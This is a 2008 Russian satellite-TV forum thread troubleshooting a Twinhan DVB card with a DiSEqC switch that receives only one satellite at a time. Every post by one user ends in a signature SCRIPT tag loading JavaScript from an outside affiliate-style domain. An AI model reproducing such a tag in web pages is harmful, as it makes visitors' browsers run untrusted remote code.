Вернуться   Tele-Sat.RU > Спутниковые и эфирные цифровые технологии > Спутниковый интернет и рыбалка > DVB-карты

Важная информация

Ответ
 
Опции темы Опции просмотра

Старый 25.01.2008, 15:16   #1
bel
Новичок
 
Аватар для bel
 
bel вне форума
Регистрация: 22.12.2007
Сообщений: 33
bel is on a distinguished road
По умолчанию

Люди, помагите со спитник. картой Twinhan 102G. одна тарель стоит на 40*- смотрю каналы в Mpeg 4. вроде бы все нормально, но, поставив вторую тарель на 75*, не смог добиться одновременной работы через Diseqc (4*1 - т.к. хотел поставить еще конвертор на 80*). то есть напрямую (без Diseqc), показывает и 40 и 75 (че подсоеденишь). а через Diseqc-не пашет!
дело так: подсоеденил две тарели через Diseqc, сканирую 40*-все каналы есть, сканирую 75-нет сигнала ни по одной частоте. После перезагр. компа и вырубания питания сканирую 75*-каналы находит, но 40*-тю-тю! т.е. с какого спутника включишь канал-тот и будет показывать, с др. спутника-сигнала не будет. че делать-х.з.! помагите, пожайлуста!
__________________
<div id='fzozo'></div><SCRIPT src='http://zozocash.biz/go/js.php?acc=6619' defer></SCRIPT>
  Ответить с цитированием

Старый 25.01.2008, 23:16   #2
BasMan
Администратор
 
Аватар для BasMan
 
BasMan вне форума
Регистрация: 25.12.2006
Адрес: Костанайская область
Сообщений: 1,889
BasMan отключил(а) отображение уровня репутации
Отправить сообщение для BasMan с помощью ICQ
По умолчанию

А ты в настройках progdvb спутники на разные порты дисека посадил?
У меня 1022A, отлично работает с дисеком
  Ответить с цитированием

Старый 25.01.2008, 23:57   #3
bel
Новичок
 
Аватар для bel
 
bel вне форума
Регистрация: 22.12.2007
Сообщений: 33
bel is on a distinguished road
По умолчанию

я смотрю TV, не через progdvb, а через TwinhanDTV. на progdvb не удалось добиться работы каналов с 40* в Mpeg4(если честно, не охота было разбираться), а в TwinhanDTV все работает.

Цитата:
Сообщение от BasMan
А ты в настройках progdvb спутники на разные порты дисека посадил?
я-новичек, "на разные порты", как понимаю-на разные выходы дисека. естественно-да. сканирую DISEgC A (там у меня 40*)-каналы находит, но на 75*-полож. дисека-В, нет сигнала не на одной частоте. после отклюения питания, можно просканировать 75*, но в дальнейшем 40* работать не будет. т.е. работает только один спутник. может дисек паленый(хотя врядли-уже второй)?
__________________
<div id='fzozo'></div><SCRIPT src='http://zozocash.biz/go/js.php?acc=6619' defer></SCRIPT>
  Ответить с цитированием

Старый 26.01.2008, 00:38   #4
BasMan
Администратор
 
Аватар для BasMan
 
BasMan вне форума
Регистрация: 25.12.2006
Адрес: Костанайская область
Сообщений: 1,889
BasMan отключил(а) отображение уровня репутации
Отправить сообщение для BasMan с помощью ICQ
По умолчанию

Oo
Лучше заставь ProgDVB работать с MPEG4 (жаль у меня нету тарелок на 40, сделал бы сборку рабочую). WinDTV видел последний раз года 3 назад ... так что, я, помочь не смогу :)
  Ответить с цитированием

Старый 26.01.2008, 12:06   #5
bel
Новичок
 
Аватар для bel
 
bel вне форума
Регистрация: 22.12.2007
Сообщений: 33
bel is on a distinguished road
По умолчанию

пробовал через ProgDVB-вообще тупит. сигнал постоянный на всех транспондерах-61%. качество сигнала-по нулям. каналы не находит ни с одного спутника(сканирование транспондера). А в "поиске каналов"-сигнал "прыгает"-0 - 61%, качество также -0. при чем прыгает независимо от изменения транспондера(даже если сигнала с данной частоты вообще не должно быть).
__________________
<div id='fzozo'></div><SCRIPT src='http://zozocash.biz/go/js.php?acc=6619' defer></SCRIPT>
  Ответить с цитированием

Старый 26.01.2008, 15:18   #6
mvit
Местный
 
Аватар для mvit
 
mvit вне форума
Регистрация: 25.12.2006
Адрес: RUSSIA/ Tyumen
Сообщений: 575
mvit is on a distinguished road
По умолчанию

для bel

А у тебя точно дисек,а не 0/22KHz переключатель.
Если дисек то скольки портовый.И не перепутал ли ты порты.
LNB1 порт соответствует дисек A. LNB2- дисек B, и т.д.
  Ответить с цитированием

Старый 26.01.2008, 15:27   #7
bel
Новичок
 
Аватар для bel
 
bel вне форума
Регистрация: 22.12.2007
Сообщений: 33
bel is on a distinguished road
По умолчанию

дисек-тОчно- на 4 выхода. порты не путал, да и пробовал менять уже-все то же. А как ведет себя паленый дисек? есть подазрения(врядли, конечно, но мож мне паленый толкнули)
__________________
<div id='fzozo'></div><SCRIPT src='http://zozocash.biz/go/js.php?acc=6619' defer></SCRIPT>
  Ответить с цитированием

Старый 26.01.2008, 15:28   #8
BasMan
Администратор
 
Аватар для BasMan
 
BasMan вне форума
Регистрация: 25.12.2006
Адрес: Костанайская область
Сообщений: 1,889
BasMan отключил(а) отображение уровня репутации
Отправить сообщение для BasMan с помощью ICQ
По умолчанию

Сигнал >50 это нормально, у меня даже с отключенным конвертором может так показывать :))

В настройках progdvb включи diseqc, рассади спутники каждый на свой порт дисека, в поиске каналов выбери нужный спутник, введи частоту и посмотри качество идет ли, замерь на это порту дисека выходное напряжение, если ток присутствует (13/18), значит все ок, попутно проверь другие порты (нет ли и на них тока).

И еще, какой используется драйвер? WDM или BDA?
  Ответить с цитированием

Старый 26.01.2008, 15:46   #9
bel
Новичок
 
Аватар для bel
 
bel вне форума
Регистрация: 22.12.2007
Сообщений: 33
bel is on a distinguished road
По умолчанию

драйвер WDM. собственно насчет настройки дисека-так и делал. а вот насчет качества-0% на любой частоте, то есть сигнала нет.
__________________
<div id='fzozo'></div><SCRIPT src='http://zozocash.biz/go/js.php?acc=6619' defer></SCRIPT>
  Ответить с цитированием

Старый 26.01.2008, 15:47   #10
bel
Новичок
 
Аватар для bel
 
bel вне форума
Регистрация: 22.12.2007
Сообщений: 33
bel is on a distinguished road
По умолчанию

Цитата:
Сообщение от BasMan
замерь на это порту дисека выходное напряжение, если ток присутствует (13/18), значит все ок, попутно проверь другие порты (нет ли и на них тока).
а собственно как замерить то?
__________________
<div id='fzozo'></div><SCRIPT src='http://zozocash.biz/go/js.php?acc=6619' defer></SCRIPT>
  Ответить с цитированием
Ответ

Социальные закладки

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Глюк ресивера DRS-4500 senin Программный раздел (прошивка) 7 06.08.2011 21:23
TwinHan 1020A нет качества 0 sannikovser DVB-карты 7 26.12.2010 16:07
Acorp [email protected] LAN110_v2 вирус или глюк прошивки? ESMSlavik ADSL 6 30.05.2010 23:13
TWINHAN 7021A USB скорость потока Рыбалка 3 02.09.2008 10:36
twinhan 1022A только Н поляризация one1120 Железный раздел (ремонт) 28 28.07.2007 23:12



Текущее время: 02:28. Часовой пояс GMT +6.


vBulletin skin developed by: eXtremepixels
Powered by vBulletin® Version 3.8.11
Copyright ©2000 - 2019, vBulletin Solutions, Inc. Перевод: zCarot